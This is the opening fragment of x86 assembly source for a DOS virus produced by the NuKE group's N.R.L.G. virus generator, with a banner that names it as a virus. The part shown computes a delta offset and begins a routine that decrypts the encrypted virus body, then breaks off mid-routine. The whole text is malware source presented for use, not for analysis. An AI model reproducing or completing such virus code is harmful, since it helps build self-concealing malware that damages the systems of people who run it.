;旼컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴커
; THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS.         [NuKE] PoWeR
; CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN   [NuKE] WaReZ
; auToR: aLL [NuKE] MeMeBeRS                              [NuKE] PoWeR
; [NuKE] THe ReaL PoWeR!                                  [NuKE] WaReZ
; NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994                    [NuKE] PoWeR
;읕컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴켸

.286
code    segment
assume cs:code,ds:code
org  100h

start:  CALL NEXT 
 
NEXT:  
       mov di,sp             ;take the stack pointer location 
       mov bp,ss:[di]        ;take the "DELTA HANDLE" for my virus       
       sub bp,offset next    ;subtract the large code off this code 
                             ;
;*******************************************************************
;                      #1 DECRYPT ROUTINE                               
;*******************************************************************

cmp byte ptr cs:[crypt],0b9h ;is the first runnig?        
je crypt2                    ;yes! not decrypt              
;----------------------------------------------------------                                          
mov cx,offset fin            ;cx = large of virus               
lea di,[offset crypt]+ bp    ;di = first byte to decrypt          
mov dx,1                     ;dx = value for decrypt          
;----------------------------------------------------------                                                   
deci:                        ;deci = fuck label!                                    
;----------------------------------------------------------

